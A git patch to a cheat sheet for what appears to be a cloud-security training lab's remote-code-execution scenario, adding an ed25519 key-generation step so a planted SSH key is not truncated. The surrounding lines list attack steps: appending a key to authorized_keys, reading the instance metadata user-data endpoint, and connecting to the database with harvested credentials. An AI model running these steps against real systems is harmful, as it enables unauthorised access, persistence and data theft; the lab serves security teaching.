From bd00528c1a59feb2872afa98c3fba749edc98f24 Mon Sep 17 00:00:00 2001
From: j0eblow <mtbackus@gmail.com>
Date: Wed, 30 Jun 2021 13:35:09 -0700
Subject: [PATCH] Correction to Lara cheat sheet

The SSH key pair generated for the RCE needs to have a public key that's short enough for the RCE. A long public key, such as an RSA public key generated with ssh-keygen, will get truncated in the RCE and cause the command to fail. Using an ed25519 key pair solves this issue.
---
 scenarios/rce_web_app/cheat_sheet_lara.md | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/scenarios/rce_web_app/cheat_sheet_lara.md b/scenarios/rce_web_app/cheat_sheet_lara.md
index 9c3c7f20..523bf560 100644
--- a/scenarios/rce_web_app/cheat_sheet_lara.md
+++ b/scenarios/rce_web_app/cheat_sheet_lara.md
@@ -10,6 +10,8 @@
 
 `aws elbv2 describe-load-balancers --profile Lara`
 
+`ssh-keygen -t ed25519` (An ed25519 key pair is necessary here because using an RSA public key is too long and gets truncated in the RCE)
+
 `echo "public ssh key" >> /home/ubuntu/.ssh/authorized_keys`
 
 `curl ifconfig.me`
@@ -40,4 +42,4 @@
 
 `curl http://169.254.169.254/latest/user-data`
 
-`psql postgresql://<db_user>:<db_password>@<rds-instance>:5432/<db_name>`
\ No newline at end of file
+`psql postgresql://<db_user>:<db_password>@<rds-instance>:5432/<db_name>`